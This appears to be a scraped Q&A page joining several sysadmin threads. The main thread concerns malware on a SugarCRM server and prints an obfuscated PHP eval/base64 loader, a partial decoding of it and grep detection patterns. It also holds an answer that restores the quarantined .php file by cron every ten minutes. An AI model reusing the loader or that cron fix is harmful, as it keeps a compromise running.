Since last 4 days, we are facing strange issue on our Production server (AWS EC2 instance) specific to only one site which is SugarCRM.
Issue is /home/site_folder/public_html/include/MassUpdate.php file is renamed automatically to /home/site_folder/public_html/include/MassUpdate.php.suspected
This happens 2-3 times in a day with 3-4 hours of gap. This issue occurs only in case of specific site, even it doesn't occur for staging replica of the same site. I even checked code of that file from both sites, it's same.
We have Googled and found, such issue occurs mostly for Wordpress sites and it could be because of attack. But we checked our server against the attack, there isn't any. Also there is no virus/malware scan running on server.
What should we do?
Update:
We found few things after going through this link
We executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ And found that there are few files with following sample code.
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
Seems some malware, how we go about removing it permanently?
Thanks
The renaming of .php files to .php.suspected keeps happening today. The following commands should not come up with something:
find <web site root> -name '*.suspected' -print
find <web site root> -name '.*.ico' -print
In my case, the infected files could be located with the following commands:
cd <web site root>
egrep -Rl '\$GLOBALS.*\\x'
egrep -Rl -Ezo '/\*(\w+)\*/\s*#include\s*[^;]+;\s*/\*'
egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'
I have prepared a longer description of the problem and how to deal with it at GitHub.
It's somewhat obfuscated, but I've de-obfuscated it.The function flnftovr takes a string and an array as arguments. It creates a new string $ggy using the formula
isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];}
It then preppends base64_decode to the string.
The string is $s, the array is $koicev. It then evals the result of this manipulation. So eventually a string gets created:
base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=)
So what actually gets run on your server is:
#ini_set('error_log', NULL);
#ini_set('log_errors', 0);
#ini_set('max_execution_time', 0);
#set_time_limit(0);
if(isset($_SERVER)
encode(serialize($res));
}
If you didn't create this and you suspect your site has been hacked, I'd suggest you wipe the server, and create a new installation of whatever apps are running on your server.
Renaming php files to php.suspected is usually intended and done by hacker's script. They change file extension to give the impression that the file was checked by some antimalware software, is secure and can't be executed. But, in fact, isn't. They change extension to "php" anytime they want to invoke the script and after it, they change the extension back to "suspected".
You can read about it on Securi Research Labs
Maybe this post is old but the topic is still alive. Especially according to June 2019 malware campaign targeting WordPress plugins. I found a few "suspected" files in my client's WordPress subdirectories (e.g. wp-content)
Posting this answer, it may help others.
Create a file with '.sh' extension at your convenient location.
Add following code in it.
#Rename your_file_name.php.suspected to your_file_name.php
mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php
Save this file.
Set cron for every 10 minute (or whatever interval you need), using following line in crontab
*/10 * * * * path_to_cron_file.sh
Restart crontab service.
You will get lot of documentation on creating cron on Google.
Related
I'm running php5 FPM with APC as an opcode and application cache. As is usual, I am logging php errors into a file.
Since that is becoming quite large, I tried to configure logrotate. It works, but after rotation, php continues to log to the existing logfile, even when it is renamed. This results in scripts.log being a 0B file, and scripts.log.1 continuing to grow further.
I think (haven't tried) that running php5-fpm reload in postrotate could resolve this, but that would clear my APC cache each time.
Does anybody know how to get this working properly?
I found that "copytruncate" option to logrotate ensures that the inode doesn't change. Basically what is [sic!] was looking for.
This is probably what you're looking for. Taken from: How does logrotate work? - Linuxquestions.org.
As written in my comment, you need to prevent PHP from writing into the same (renamed) file. Copying a file normally creates a new one, and the truncating is as well part of that options' name, so I would assume, the copytruncate option is an easy solution (from the manpage):
copytruncate
Truncate the original log file in place after creating a copy,
instead of moving the old log file and optionally creating a new
one, It can be used when some program can not be told to close
its logfile and thus might continue writing (appending) to the
previous log file forever. Note that there is a very small time
slice between copying the file and truncating it, so some log-
ging data might be lost. When this option is used, the create
option will have no effect, as the old log file stays in place.
See Also:
Why we should use create and copytruncate together?
Another solution I found on a server of mine is to tell php to reopen the logs. I think nginx has this feature too, which makes me think it must be quite common place. Here is my configuration :
/var/log/php5-fpm.log {
rotate 12
weekly
missingok
notifempty
compress
delaycompress
postrotate
invoke-rc.d php5-fpm reopen-logs > /dev/null
endscript
}
I've tried to include as much info in this post as possible.
I'm using Postfix on an Amazon EC2 Ubuntu server and it seems that a PHP script I have aliased to an address isn't firing. Mailing works fine but the script just isn't firing. I've probably missed something easy and would appreciate any other ideas with this.
The code below is that of the script. At the moment it is just a basic script to write to a file the contents of php://stdin. I'm not sure if this is the best way to write this script but it seems to be ok for now as it's just a temporary one to use for troubleshooting this problem.
#!/usr/bin/php -q
<?php
$data = '';
$fileName = "parsedData.txt";
$stdin = fopen('php://stdin', 'r');
$fh = fopen($fileName, 'w');
while(!feof($stdin))
{
$data .= fgets($stdin, 8192);
}
fwrite($fh, $data);
fclose($stdin);
fclose($fh);
?>
I have verified this works by passing it a .txt file containing some text.
./test2.php < data.txt
Now that my PHP script seems to work fine locally, I need to make sure it is being called correctly. sudo chmod 777 has been run on the test2.php script. Here is the relevant /etc/aliases file entry.
test: "|/usr/bin/php -q /var/test/php/test2.php"
I run newaliases every time I change this. This seems to be the most correct syntax as it specifies the location of php fully. test#mydomain receives emails fine from both internal and external when it is not set to be aliased. According to syslog this is successfully delivered to the command rather than maildir.
postfix/local[2117]: 022AB407CC: to=<test#mydomain.com>, relay=local, delay=0.5, delays=0.43/0.02/0/0.05, dsn=2.0.0, status=sent **(delivered to command: /usr/bin/php -q /var/test/php/test2.php)**
The alias has also been written in the following ways without success (either because they go to maildir instead of the command due to wrong syntax or the script just isn't firing).
test: |"php -q /var/test/php/test2.php"
test: "|php -q /var/test/php/test2.php"
test: |"/usr/bin/php -q /var/test/php/test2.php"
test: "| php -q /var/test/php/test2.php"
test: "|/var/test/php/test2.php"
test: |"/var/test/php/test2.php"
The relevent part of my postfix main.cf files looks like this -
myhostname = domainnamehere.com
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
myorigin = /etc/mailname
mydestination = domainnamehere.com, internalawsiphere, localhostinternalaws, localhost
relayhost =
mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
mailbox_command =
home_mailbox = Maildir/
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
inet_protocols = all
I had error_log("script has started!"); at the beginning of test2.php so that it would appear in the php log file if the script was successfully being called. I made sure to go into the php.ini to turn on error_logging and specify a location for it to save to but I couldn't get this to work. It would help to be able to get this to work because I could tell if the script was failing when it go to the php://stdin function as there may be some problem with it handling emails rather than cat'ed .txt files.
My end goal is to get a service that will save emails on a certain addresss, with their attachments, to a MySQL database and then return a unique code for each file/email to the user. Is there an easier way to do something like this than use php scripts? does something like squirrelmail or dbmail do this?
I've completely exhausted my ideas with this one. Maybe I should just try another email service?
Oh wise people of StackOverflow, help me!
First things first, chmod 777 <foo> is almost always a gigantic mistake. I recognize that you're in a state of desperation -- as indicated by the fact that you ran this command. You want to configure your systems with the least amount of required privilege for each portion of the system to properly do its job. This helps prevent security breaches and reduces needless coupling. But executable files should not be writable by anyone except the executable owner -- and even then, I strongly recommend against it.
Now, onto your problem:
#!/usr/bin/php -q
<?php
$data = '';
$fileName = "parsedData.txt";
You're referring to a file using a relative pathname. This is fine, if you're always confident of the directory in which it starts, or if you want the user to be in control of the directory in which it starts, but it is usually a bad idea for automated tools. The /etc/aliases mechanism may run the aliased commands in the postfix home directory, it might pick an empty directory in /var created just for the purpose, and future releases are more or less free to change this behavior as they wish. Change this path name to an absolute pathname showing exactly where you would like this file to be created -- or insert an explicit chdir() call at the start of your script to change directories to exactly where you want your data to go.
Next:
$fh = fopen($fileName, 'w');
while(!feof($stdin))
{
$data .= fgets($stdin, 8192);
}
fwrite($fh, $data);
You did not ensure that the file was actually opened. Check those return values. They will report failure for you very quickly, helping you find bugs in your code or local misconfigurations. I do not know PHP well enough to tell you the equivalent of the perror(3) function that will tell you exectly what failed, but it surely can't be too difficult to get a human-readable error code out of the interpreter. Do not neglect the error codes -- knowing the difference between Permission Denied vs File or directory not found can save hours once your code is deployed.
And, as Michael points out, a mandatory access control tool can prevent an application from writing in specific locations. The "default" MAC tool on Ubuntu is AppArmor, but SELinux, TOMOYO, or SMACK are all excellent choices. Run dmesg and look in /var/log/audit/audit.log to see if there are any policy violations. If there are, the steps to take to fix the problem vary based on which MAC system you're using. Since you're on Ubuntu, AppArmor is most likely; run aa-status to get a quick overview of the services that are confined on your system, and aa-logprof should prompt you to modify policy as necessary. (Don't blindly say "Allow", either -- perhaps active exploit attempts have been denied.)
(If you aren't using a MAC system already, please consider doing so. I've worked on the AppArmor project for twelve years and wouldn't consider not confining all applications that communicate over the network -- but that's my own security needs. More paranoid people may wish to confine more of their systems, less paranoid people may wish to confine less of their systems.)
Is there a way to view the PHP error logs or Apache error logs in a web browser?
I find it inconvenient to ssh into multiple servers and run a "tail" command to follow the error logs. Is there some tool (preferably open source) that shows me the error logs online (streaming or non-streaming?
Thanks
A simple php code to read log and print:
<?php
exec('tail /var/log/apache2/error.log', $error_logs);
foreach($error_logs as $error_log) {
echo "<br />".$error_log;
}
?>
You can embed error_log php variable in html as per your requirement. The best part is tail command will load the latest errors which wont make too load on your server.
You can change tail to give output as you want
Ex. tail myfile.txt -n 100 // it will give last 100 lines
See What commercial and open source competitors are there to Splunk? and I would recommend https://github.com/tobi/clarity
Simple and easy tool.
Since everyone is suggesting clarity, I would also like to mention tailon. I wrote tailon as a more modern and secure alternative to clarity. It's still in its early stages of development, but the functionality you need is there. You may also use wtee, if you're only interested in following a single log file.
You good make a script that reads the error logs from apache2..
$apache_errorlog = file_get_contents('/var/log/apache2/error.log');
if its not working.. trying to get it with the php functions exec or shell_exec and the command 'cat /var/log/apache2/error.log'
EDIT: If you have multi servers(i quess with webservers on it) you can create a file on the machine, when you make a request to that script(hashed connection) you get the logs from that server
I recommend LogHappens: https://loghappens.com, it allows you to view the error log in web, and this is what it looks like:
LogHappens supports kinds of web server log format, it comes with parses for Apache and CakePHP, and you can write your own.
You can find it here: https://github.com/qijianjun/logHappens
It's open source and free, I forked it and do some work to make it work better in dev env or in public env. That is:
Support token for security, one can't access the site without the token in config.php
Support IP whitelists for security and privacy
Sopport config the interval between ajax requests
Support load static files from local (for local dev env)
I've found this solution https://code.google.com/p/php-tail/
It's working perfectly. I only needed to change the filesize, because I was getting an error first.
56 if($maxLength > $this->maxSizeToLoad) {
57 $maxLength = $this->maxSizeToLoad;
58 // return json_encode(array("size" => $fsize, "data" => array("ERROR: PHPTail attempted to load more (".round(($maxLength / 1048576), 2)."MB) then the maximum size (".round(($this->maxSizeToLoad / 1048576), 2) ."MB) of bytes into memory. You should lower the defaultUpdateTime to prevent this from happening. ")));
59 }
And I've added default size, but it's not needed
125 lastSize = <?php echo filesize($this->log) || 1000; ?>;
I know this question is a bit old, but (along with the lack of good choices) it gave me the idea to create this tiny (open source) web app. https://github.com/ToX82/logHappens. It can be used online, but I'd use an .htpasswd as a basic login system. I hope it helps.
I'll get mallwared site hosted on linux hosting. All php files now start from lines:
<?php
$md5 = "ad05c6aaf5c532ec96ad32a608566374";
$wp_salt = array( ... );
$wp_add_filter = create_function( ... );
$wp_add_filter( ... );
?>
How I can cleanup it's with bash/sed or something?
You should restore your backup.
FILES="*.php"
for f in $FILES
do
cat $f | grep -v 'wp_salt|wp_add_filter|wp_add_filter' > $f.clean
mv $f.clean $f
done
Just a warning, the wp_add_filter() recursively evaluates encoded php code, which in turn calls another script that is encoded and evaluated. This larger script not only injects malicious code throughout your site but appears to collect credentials, and execute other hacks. You should not only clean your site, but make sure the flaw is fixed and any credentials that might have been exposed are changed. In the end, it appears to be a wordpress security issue but I've not confirmed this. I've added some comments on this over at http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html, which includes a clean-up script and more information on how to decode the malicious script.
You can do it with PHP (fopen, str_replace and fwrite) . There shouldn't be any encoding problems.
I just hit with this on a very full hosting account, every web file full of php?!
Much digging and post reading everywhere I came across this guys cleaner code (see http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html) - and tried it on a couple of the least important sites first.
So far so good. Pretty much ready to dig in and utilize it account wide to try and wipe this right off.
The virus/malware seems to be called "!SShell v. 1.0 shadow edition!" and infected my hosting account today. Along with the cleaner at http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html, you actually need to discover the folder containing the shell file that gives the hackers full access to your server files and also discover the "wp-thumb-creator.php" that's the file that does all the php injection. I've posted more about this # my blog: http://www.marinbezhanov.com/web-development/6/malware-alert-september-2011-sshell-v.1.0/
I need to find out quota details for the current user,
I`ve tried
exec("quota 'username'", $retParam)
and also system() but nothing is returned.
Any ideas ?
Thank you.
The user PHP runs under is probably not allowed to get other users' quotas - maybe not even its own, or maybe it's not even allowed to execute external commands. Depending on your server setup, you may be able to change PHP's configuration (remove safe_mode for example) and elevate the rights of the PHP user, but I don't know whether that's a wise thing to do. If you are on shared hosting, you would have to speak to your provider whether anything can be done.
This blog entry outlines a clever way to get around PHP's limitations by collecting all quotas in a text file in an external cron job, and parsing that file with PHP. Works only if you have access to the server, of course, or can set up cron jobs with more liberal permissions than the PHP user.
To give a code example and extend the above answer
You need root access + a directory that is readable by your webserver.
do crontab -e
and add
0 * * * * quota -u -s someusername | grep /dev > /path/to/webserver/quota.txt
The above line will save the quota of user someusername in quota.txt located in the webserver folder every hour.
Then write a PHP file to show it
$quota_txt= file_get_contents("quota.txt");
$quota_arr = explode(" ",$quota_txt);
function rm_g($str){
return intval(substr_replace($str, "", -1));
}
echo "total quota: ". $quota_arr[4]."<br>";
echo "used: ". $quota_arr[3]."<br>";
$free =(rm_g($quota_arr[4]))-rm_g($quota_arr[3]);
echo "free: " . $free . "G";
Not perfect, and it need to be adapted if you are in a use-case where the human-readable format is not G (gigabytes), in that case remove the -s and parse bytes then convert the bytes output to human-readable in PHP
Also as you may have guessed, the cronjob is hourly, which means user is not getting realtime stats, there might be some inconsistencies. you may want to increase the frequency of the cron.
Another intensive approach is to get quota as above, but do du every time to get really used space. (look for "get folder size with PHP efficiently" here and you will find codes). This will get you the real-time remaining quota